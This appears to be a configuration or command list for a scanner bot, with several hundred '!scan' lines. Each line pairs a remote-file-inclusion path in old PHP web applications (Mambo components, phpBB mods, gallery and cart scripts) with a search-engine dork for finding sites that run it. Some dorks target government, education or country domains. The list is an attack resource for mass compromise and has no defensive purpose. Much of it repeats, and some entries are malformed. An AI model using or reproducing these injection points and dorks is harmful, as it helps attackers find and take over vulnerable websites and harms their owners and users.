!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan index.php?pageurl= inurl:"index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= "fusion news management system"
!scan index.php?var= inurl:"index.php?var=*.php"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?go= inurl:"index.php?go="
!scan index.php?site= inurl:"index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?id= inurl:"index.php?id=*.php"
!scan index1.php?= inurl:"index1.php?=*.php?
!scan index.php?site= inurl:"index.php?site=*.php"
!scan main.php?id= inurl:"main.php?id=*.php"
!scan content.php?page= inurl:"content.php?page=*.php"
!scan admin.php?page= inurl:"admin.php?page=*.php"
!scan lib/gore.php?libpath= inurl:"/SQuery/"
!scan SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
!scan index2.php?p= inurl:"index2.php?p=*.php"
!scan index1.php?go= inurl:"index1.php?go=*.php"
!scan news_detail.php?file= inurl:"news_detail.php?file=*.php"
!scan old_reports.php?file= inurl:"old_reports.php?file=*.php"
!scan index.php?x= inurl:"index.php?x=*.php"
!scan index.php?nic= inurl:"index.php?nic=*.php"
!scan homepage.php?sel= inurl:"homepage.php?sel=*.php"
!scan index.php?sel= inurl:"index.php?sel=*.php"
!scan main.php?x= inurl:"main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks"
!scan index2.php?x= inurl:index2.php?x=*.php"
!scan main.php?pagina= inurl:"main.php?pagina=*.php"
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:"edu/index.php?page=*.php"
!scan *.php?page= inurl:*.php?page=*.php"
!scan index.php?oldal= inurl:"index.php?oldal=*.php"
!scan index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php"
!scan index.php?pag= inurl:"index.php?pag=*.php"
!scan index.php?incl= inurl:"index.php?incl="
!scan avatar.php?page= inurl:"avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= inurl:"edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:"com/index.php?x=*.php"
!scan index.php?mode= inurl:"com/index.php?mode=*.php"
!scan index.php?stranica= inurl:"index.php?stranica="
!scan index.php?sub= inurl:"il/index.php?sub=*.php"
!scan index.php?id= inurl:"/index.php?id=*.php"
!scan index.php?t= inurl:"/index.php?t=*.php"
!scan index.php?r= inurl:"index.php?r=*.php"
!scan index.php?menu= inurl:"net/index.php?menu=*.php"
!scan index.php?pag= inurl:"com/index.php?pag=*.php"
!scan solpot.html?body= allinurl: "solpot.html?body"
!scan port.php?content= inurl:port.php?content=*.php"
!scan index0.php?show= inurl:index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan content.php?page= inurl:"*content.php?page=*.php"
!scan index.php?topic= inurl:"/index.php?topic=*.php"
!scan index.php?u= inurl:"/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"
!scan modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= inurl:"vwar"
!scan index.php?loc= allinurl:.br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan myevent.php?myevent_path= inurl:myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"
!scan myevent.php?myevent_path= inurl:"uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan show.php?path= inurl:fclick
!scan show.php?path= inurl:.ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
!scan index.php?template= inurl:"index.php?"
!scan search.php?cutepath= inurl:"search.php?"
!scan show_news.php?cutepath= inurl:"show_news.php?"
!scan page.php?doc= allinurl:"page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm"
!scan help.php?css_path= inurl:phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/"
!scan big.php?pathtotemplate= inurl:".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
!scan index2.php?to= inurl:"/index2.php?to=*.php"
!scan index.php?load= inurl:"/index.php?load=*.php"
!scan home.php?pagina= inurl:"home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php"
!scan /popup_window.php?site_isp_root= inurl:"Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:uk
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"
!scan /components/com_simpleboard/image_upload.php?sbp= inurl:"com_simpleboard"

!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:"index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= allinurl:"mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"
!scan /main.php?sayfa= inurl:"main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan index.php?pageurl= inurl:"index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
!scan index.php?var= inurl:"index.php?var=*.php"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?go= inurl:"index.php?go="
!scan index.php?site= inurl:"index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= inurl:"index.php?pagina=*.php"
!scan index.php?id= inurl:"index.php?id=*.php"
!scan index1.php?= inurl:"index1.php?=*.php?
!scan index.php?site= inurl:"index.php?site=*.php"
!scan main.php?id= inurl:"main.php?id=*.php"
!scan content.php?page= inurl:"content.php?page=*.php"
!scan admin.php?page= inurl:"admin.php?page=*.php"
!scan lib/gore.php?libpath= inurl:"/SQuery/"
!scan SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
!scan index2.php?p= inurl:"index2.php?p=*.php"
!scan index1.php?go= inurl:"index1.php?go=*.php"
!scan news_detail.php?file= inurl:"news_detail.php?file=*.php"
!scan old_reports.php?file= inurl:"old_reports.php?file=*.php"
!scan index.php?x= inurl:"index.php?x=*.php"
!scan index.php?nic= inurl:"index.php?nic=*.php"
!scan homepage.php?sel= inurl:"homepage.php?sel=*.php"
!scan index.php?sel= inurl:"index.php?sel=*.php"
!scan main.php?x= inurl:"main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks"
!scan index2.php?x= inurl:index2.php?x=*.php"
!scan main.php?pagina= inurl:"main.php?pagina=*.php"
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:"edu/index.php?page=*.php"
!scan *.php?page= inurl:*.php?page=*.php"
!scan index.php?oldal= inurl:"index.php?oldal=*.php"
!scan index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php"
!scan index.php?pag= inurl:"index.php?pag=*.php"
!scan index.php?incl= inurl:"index.php?incl="
!scan avatar.php?page= inurl:"avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= inurl:"edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:"com/index.php?x=*.php"
!scan index.php?mode= inurl:"com/index.php?mode=*.php"
!scan index.php?stranica= inurl:"index.php?stranica="
!scan index.php?sub= inurl:"il/index.php?sub=*.php"
!scan index.php?id= inurl:"/index.php?id=*.php"
!scan index.php?t= inurl:"/index.php?t=*.php"
!scan index.php?r= inurl:"index.php?r=*.php"
!scan index.php?menu= inurl:"net/index.php?menu=*.php"
!scan index.php?pag= inurl:"com/index.php?pag=*.php"
!scan solpot.html?body= allinurl: "solpot.html?body"
!scan port.php?content= inurl:port.php?content=*.php"
!scan index0.php?show= inurl:index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"
!scan content.php?page= inurl:"*content.php?page=*.php"
!scan index.php?topic= inurl:"/index.php?topic=*.php"
!scan index.php?u= inurl:"/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"
!scan modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= inurl:"vwar"
!scan index.php?loc= allinurl:.br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php
!scan myevent.php?myevent_path= inurl:myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"
!scan myevent.php?myevent_path= inurl:"uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository
!scan show.php?path= inurl:fclick
!scan show.php?path= inurl:.ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"
!scan index.php?template= inurl:"index.php?"
!scan search.php?cutepath= inurl:"search.php?"
!scan show_news.php?cutepath= inurl:"show_news.php?"
!scan page.php?doc= allinurl:"page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm"
!scan help.php?css_path= inurl:phplive site:.uk
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/"
!scan big.php?pathtotemplate= inurl:".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
!scan index2.php?to= inurl:"/index2.php?to=*.php"
!scan index.php?load= inurl:"/index.php?load=*.php"
!scan home.php?pagina= inurl:"home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
!scan /include/write.php?dir= allinurl:/zboard/zboard.php
!scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:"com_mtree"
!scan homepage.php?sel= inurl:"homepage.php?sel="
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php"
!scan /popup_window.php?site_isp_root= inurl:"Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:us
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:"index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:us
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= allinurl:"mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"
!scan /main.php?sayfa= inurl:"main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
!scan /tools/send_reminders.php?includedir=
!scan module_db.php?pivot_path= allinurl:"module_db.php?pivot_path="
!scan /classes/adodbt/sql.php?classes_dir= allinurl:"/classes/adodbt/sql.php?classes_dir="
!scan inc/cmses/aedatingCMS.php?dir[inc]= inurl:"flashchat"
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar
!scan bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= inurl:forum
!scan components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
!scan allinurl:com_extended_registration
!scan index.php?RP_PATH= inurl:reviewpost
!scan index.php?pagename= allinurl:phpquiz
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/com_remository/
!scan smarty_config.php?root_dir= inurl:"smarty"
!scan /components/com_forum/download.php?phpbb_root_path= inurl:com_forum
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter
!scan include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
!scan /classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss"
!scan send_reminders.php?includedir= inurl:"send_reminders.php?includedir="
!scan components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= com_rsgallery
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" inurl:index.php
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= allinurl:"com_cpg"
!scan [Script Path]/admin/index.php?o= allinurl:"admin/index.php";
!scan /admin/index.php?o= allinurl:"admin/index.php";
!scan index.php?menu=deti&page= allinurl:"index.php?menu=deti&page"
!scan /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= allinurl:coppermine
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
!scan /components/com_simpleboard/image_upload.php?sbp= allinurl:"com_simpleboard"
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= inurl:com_extcalendar
!scan /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= allinurl:com_extcalendar
!scan components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
!scan admin/doeditconfig.php?thispath=../includes&config[path]= inurl:"admin"
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan SQuery/lib/gore.php?libpath= inurl:"/SQuery/"